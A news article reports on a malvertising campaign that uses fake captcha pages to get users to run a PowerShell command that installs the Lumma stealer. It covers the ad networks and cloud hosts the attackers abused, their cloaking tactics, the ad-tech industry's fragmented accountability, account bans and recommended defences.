A new cyber campaign using fake captcha verification pages has surfaced, unleashing Lumma stealer malware through a sophisticated web of deception. This large-scale operation leverages malicious PowerShell commands under the pretence of verifying their humanity, stealing sensitive data from social media credentials to the financial information of millions.
Researchers found that this campaign generated over one million ad impressions daily through a network of more than 3,000 content sites directing traffic.
The scam begins subtly: users encounter what seems to be a legitimate captcha page while browsing. After completing a set of keyboard inputs, a Windows Run dialogue appears, instructing the PowerShell command. Following these steps, victims unwittingly install stealer malware, exposing their personal and financial data.
This ploy relies on malvertising — using deceptive advertising to distribute malicious content. Attackers infiltrate ad networks to ensure their fake captcha pages reach unsuspecting users.
On further analysing the campaign, researchers found that the threat actors utilised the ad network Monetag, a PropellerAds subsidiary, embedding obfuscated JavaScript into publisher sites to redirect users to fake captcha pages.
Attackers employed advanced cloaking techniques to bypass moderation. They initially submit benign URLs to ad networks for approval, only redirecting to malicious pages later, evading scrutiny and prolonging the lifespan of malicious campaigns.

Additionally, researchers found that the attackers host their fake captcha pages on legitimate cloud services like Oracle Cloud and Cloudflare R2, leveraging these trusted platforms to mask their operations.
Researchers identified over one million daily ad impressions linked to this campaign in just ten days, distributed through 3,000 publisher sites. These sites often feature free or pirated content, drawing users into the malicious flow via pop-ups and redirects.
Cyber security experts highlight fragmented accountability within the ad tech ecosystem. Key players — ad networks, tracking services, publishers, and hosting providers — often deflect responsibility:
- Ad networks: Claim difficulty in monitoring cloaked content.
- Tracking services: Argue they provide neutral analytics tools.
- Publishers: Maintain they only monetise their platforms.
- Hosting providers: Assert ignorance of malicious use cases.
This lack of unified oversight enables malicious actors to exploit vulnerabilities with relative impunity.
Following disclosures by cybersecurity researchers, Monetag and BeMob banned over 200 accounts associated with the campaign.
Experts suggest ad networks implement post-approval checks for ongoing campaigns, perform strict account verification, and transparent reporting between networks.
Recently, reports emerged about a phishing campaign targeting employees of Kaiser Permanente via Google Ads. Last month, threat actor I2Parcae targeted victims via fake support emails and captcha tricks.
In the News: Meta pays $31.85 million to settle Cambridge Analytica lawsuit in Australia